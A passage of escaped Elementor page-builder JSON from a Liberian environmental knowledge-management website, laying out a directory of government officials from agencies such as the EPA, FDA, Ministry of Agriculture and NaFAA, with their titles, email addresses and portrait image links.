Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/Halala.jpg\",\"id\":5086,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/ernest.jpg\",\"id\":5087,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd05ae4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/wonpue.jpg\",\"id\":5091,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"784af4b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/nadine.jpg\",\"id\":5093,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\